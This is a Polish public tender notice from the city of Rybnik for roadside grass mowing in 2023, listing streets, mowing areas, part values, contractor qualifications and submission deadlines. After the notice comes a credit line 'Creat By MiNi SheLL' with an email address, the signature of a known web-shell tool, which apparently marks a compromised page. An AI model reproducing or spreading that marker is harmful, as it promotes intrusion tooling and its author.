przykrywającej trawę i powodującej rozwój pleśni oraz jej żółknięcia (nie dotyczy jezdni i rowów)<br/>Zadanie 4.<br/>Ulica Niepodległości obejmuje odcinek rozpoczynający się od skrzyżowania z ulicą Wodzisławską do końca granic administracyjnych Miasta Rybnika w kierunku Jankowic.<br/><br/>Orientacyjna powierzchnia terenu do koszenia – 12 000 m2.<br/>Ulica Wielopolska obejmuje odcinek od skrzyżowania ulic Wielopolskiej z Gliwicką do skrzyżowania ulic Wielopolskiej z Mikołowską. <br/>Koszenie nie obejmuje wysp rond.<br/>Orientacyjna powierzchnia terenu do koszenia – 22 000 m2.<br/>Obwiednia Południowa obejmuje odcinek od ronda „Lievin” (skrzyżowanie ulic: Raciborska i Budowlanych) do ronda „Chwałowickie” (skrzyżowanie ulic: Za komendą, 3-go Maja i Chwałowicka) <br/>Orientacyjna powierzchnia terenu do koszenia – 26 700 m2.<br/>Koszenie nie obejmuje wysp rond. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 39425,56 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77314100-5 - Usługi w zakresie trawników</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-11-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">dyspozycyjność</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest trzykrotne koszenie koszenie trawy, wycinka samosiewek z poboczy dróg, rowów, skarp wraz z wygrabieniem i wywozem urobku (dotyczy również chodnika i jezdni) na terenie Miasta Rybnika. W przypadku zastosowania kosiarek mulczujących urobek może pozostać na miejscu pod warunkiem jego prawidłowego rozdrobnienia, które nie spowoduje powstawania warstwy przykrywającej trawę i powodującej rozwój pleśni oraz jej żółknięcia (nie dotyczy jezdni i rowów)<br/>Zadanie 5.<br/>Ulica Wodzisławska obejmuje odcinek od ul. Leśnej do końca granic miasta w kierunku Wodzisławia. <br/>Orientacyjna powierzchnia terenów do koszenia – 19 980 m².<br/>Ulica Rudzka obejmuje odcinek rozpoczynający się od skrzyżowania z ulicą Jana Kotucza do końca granic miasta Rybnika w kierunku Rud. <br/>Orientacyjna powierzchnia terenu do koszenia – 45 900 m².<br/>UWAGA<br/>Na odcinkach w rejonie zbiorników: Orzepowice, Gzel, Pniowiec (po prawej stronie jadąc od centrum miasta) znajdują się punkty pomiarowe (repery). Miejsca te należy wykosić ręcznie w celu uniknięcia zniszczenia reperów. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 50142,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77314100-5 - Usługi w zakresie trawników</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-11-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">dyspozycyjność</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest trzykrotne koszenie trawy, wycinka samosiewek z poboczy dróg, rowów, skarp wraz z wygrabieniem i wywozem urobku (dotyczy również chodnika i jezdni) na terenie Miasta Rybnika. W przypadku zastosowania kosiarek mulczujących urobek może pozostać na miejscu pod warunkiem jego prawidłowego rozdrobnienia, które nie spowoduje powstawania warstwy przykrywającej trawę i powodującej rozwój pleśni oraz jej żółknięcia(nie dotyczy jezdni i rowów)<br/>Zadanie 6.<br/>Ulica Robotnicza obejmuje odcinek od ulicy Mikołowskiej do ronda Ukraińskiego<br/>Orientacyjna powierzchnia terenów do koszenia – 12 500 m².<br/>Ulica Szewczyka obejmuje odcinek od ronda Ukraińskiego do ronda Pod Zegarem<br/>Orientacyjna powierzchnia terenu do koszenia – 3 100 m2.<br/>Koszenie nie obejmuje wysp rond.<br/>Ulica Arki Bożka obejmuje odcinek od ulicy Robotniczej do ulicy Willowej<br/>Orientacyjna powierzchnia terenu do koszenia – 2 500 m2.<br/>Ulica Pojdy obejmuje odcinek od ronda Ukraińskiego do granicy miasta.<br/>Orientacyjna powierzchnia terenu do koszenia – 4 960 m2.<br/>Ulica Hotelowa obejmuje odcinek od ulicy Robotniczej do ulicy Jodłowej plus boczna odnoga.<br/>Orientacyjna powierzchnia terenu do koszenia – 4 950 m2.<br/>Ulica Makowa obejmuje odcinek od ulicy Robotniczej do ulicy Hotelowej, w tym drogi przyległe (odnogi od drogi głównej)<br/>Orientacyjna powierzchnia terenu do koszenia – 1 300 m2.<br/>Ulica Boya Żeleńskiego obejmuje odcinek od ulicy Hotelowej do ulicy Makowej<br/>Orientacyjna powierzchnia terenu do koszenia – 1 500 m2.<br/>Ulica Leszczyńska obejmuje odcinek od ulicy Poremby do ulicy Willowej<br/>Orientacyjna powierzchnia terenu do koszenia – 2 600 m2.<br/>Ulica Bieli obejmuje odcinek od ronda Pod Zegarem do granicy miasta.<br/>Orientacyjna powierzchnia terenu do koszenia – 3 800 m2.<br/>Koszenie nie obejmuje wysp rond.<br/>Ulica Poremby obejmuje odcinek od ulicy Bieli do ulicy Willowej<br/>Orientacyjna powierzchnia terenu do koszenia – 3 000 m2.<br/>Ulica Dudka obejmuje odcinek od ulicy Poremby do ulicy Bieli (łącznik pieszy)<br/>Orientacyjna powierzchnia terenu do koszenia – 2 200 m2.<br/>Ulica Willowa obejmuje odcinek od ronda Pod Zegarem do granicy miasta.<br/>Orientacyjna powierzchnia terenu do koszenia – 1 250 m2.<br/>Ulica Sąsiedzka obejmuje odcinek od ulicy Bieli do ulicy Brzozy.<br/>Orientacyjna powierzchnia terenu do koszenia – 2 900 m2.<br/>Ulica Jodłowa obejmuje odcinek od ulicy Pojdy do granicy lasu.<br/>Orientacyjna powierzchnia terenu do koszenia – 1 500 m2.<br/>Ulica Gminna obejmuje odcinek od ulicy Szewczyka do ulicy Arki Bożka.<br/>Orientacyjna powierzchnia terenu do koszenia – 450 m2.<br/><br/>Ulica Falista obejmuje odcinek od ulicy Arki Bożka do ulicy Walecznych.<br/>Orientacyjna powierzchnia terenu do koszenia – 1 050 m2.<br/>Ulica Walecznych obejmuje odcinek od ronda Ukraińskiego do granicy miasta, w tym drogi przyległe (odnogi od drogi głównej)<br/>Orientacyjna powierzchnia terenu do koszenia – 1 200 m2.<br/>Ulica Hanaka obejmuje odcinek od ulicy Poremby do końca (ślepa droga).<br/>Orientacyjna powierzchnia terenu do koszenia – 1 500 m2.<br/>Ulica Brzozy obejmuje odcinek od ronda „Z zegarem” do granicy miasta.<br/>Orientacyjna powierzchnia terenu do koszenia – 800 m2.<br/>Ulica Zofii Nałkowskiej obejmuje odcinek od ulicy Szewczyka do ulicy Księdza Jana Pojdy, <br/>w tym drogi przyległe (odnogi od drogi głównej).<br/>Orientacyjna powierzchnia terenu do koszenia – 500 m2. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 40765,11 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77314100-5 - Usługi w zakresie trawników</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-11-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">dyspozycyjność</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/> 1) nie podlegają wykluczeniu na podstawie art. 108 ust. 1 oraz art. 109 ust. 1 ustawy,<br/> 2) spełniają warunki udziału w postępowaniu dotyczące:<br/> a) kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów - Zamawiający nie określa warunku w tym zakresie.<br/> b)sytuacji ekonomicznej lub finansowej - Zamawiający nie określa warunku w tym zakresie.<br/> c) zdolności technicznej lub zawodowej.<br/>	Wykonawca spełni warunek jeśli dysponuje taką ilością sprzętu, aby zapewnić jednokrotne koszenie traw w terminie określonym w SWZ niezależnie od wygrania postępowania na jedno zadanie lub wszystkie zadania.<br/>	W przypadku ubiegania się o jedno zadanie lub więcej zadań, wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, należycie prace wykonane obejmujące: <br/>	minimum dwie usługi wykonane w ciągu jednego sezonu wegetacyjnego, polegające na przeprowadzeniu jednokrotnego wykaszania poboczy dróg, rowów i skarp na powierzchni minimum 550 arów każda, (załącznik nr 5 do SWZ)<br/> Warunek udziału w postępowaniu dotyczący zdolności technicznej i zawodowej dotyczący wykonanych robót musi być spełniony: <br/> przez Wykonawcę samodzielnie lub<br/> przez minimum jeden podmiot (podwykonawcę) udostępniający doświadczenie samodzielnie; <br/> w przypadku Wykonawców występujących wspólnie – samodzielnie przez minimum jednego z Wykonawców występujących wspólnie. <br/> Nie jest dopuszczalne łączenie (sumowanie) wyżej wymaganego doświadczenia w ramach doświadczenia różnych podmiotów zaangażowanych w realizację zamówienia. <br/> 2. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.<br/> Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów udowodni Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia tj. przedkładając zobowiązanie podmiotu na zasobach którego polega (wzór: załącznik nr 3,do SWZ);<br/> 3. Zamawiający ocenia, czy udostępniane Wykonawcy przez inne podmioty zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu oraz bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia,<br/> 4. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu z powodu niespełnienia warunków, o których mowa w art. 108 ust. 1 oraz art. 109 ust. 1 ustawy Pzp. Zgodnie z art. 117 ust. 4 wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy (załącznik nr 6). <br/> 5. Zamawiający może wykluczyć Wykonawcę na każdym etapie postępowania o zamówienie publiczne. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">A. Dokumenty i oświadczenia wymagane od wszystkich Wykonawców, które należy złożyć wraz z ofertą.<br/> 1. Formularz ofertowy.<br/> 2. Oświadczenie o niepodleganiu wykluczeniu z postępowania na formularzu zgodnym z treścią załącznika nr 2 do SWZ.<br/> 3. Oświadczenie o spełnianiu warunków udziału w postępowaniu na formularzu zgodnym z treścią załącznika nr 3 do SWZ.<br/> 4. Wykaz usług wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie (minimum dwie usługi wykonane w ciągu jednego sezonu wegetacyjnego, polegające na przeprowadzeniu jednokrotnego wykaszania poboczy dróg, rowów i skarp na powierzchni minimum 550 arów każda) na formularzu zgodnym z treścią załącznika nr 5 do SWZ, z załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty.<br/> 5. Oświadczenie wykonawców wspólnie ubiegających się o zamówienie (załącznik nr 6)<br/> 6. Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając wraz z ofertą zobowiązanie tych podmiotów <br/>do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.<br/> 7. Pełnomocnictwo złożone w formie oryginału lub notarialnie poświadczonej kopii w sytuacji:<br/> 1) Wykonawców wspólnie ubiegających się o udzielenie zamówienia – pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy,<br/> 2) podpisania oferty względnie innych dokumentów składanych wraz z ofertą przez osobę, dla której prawo do ich podpisania nie wynika z innych dokumentów złożonych wraz z ofertą – pełnomocnictwo do podpisania oferty.<br/> 8. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenia, <br/>o których mowa w punkcie 2 i 3 składa każdy z Wykonawców wspólnie ubiegających się <br/>o zamówienie. Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia. <br/> 9. Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu zamieszcza informacje o tych podmiotach w oświadczeniach, o których mowa w punkcie 2 i 3.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-29 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-29 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com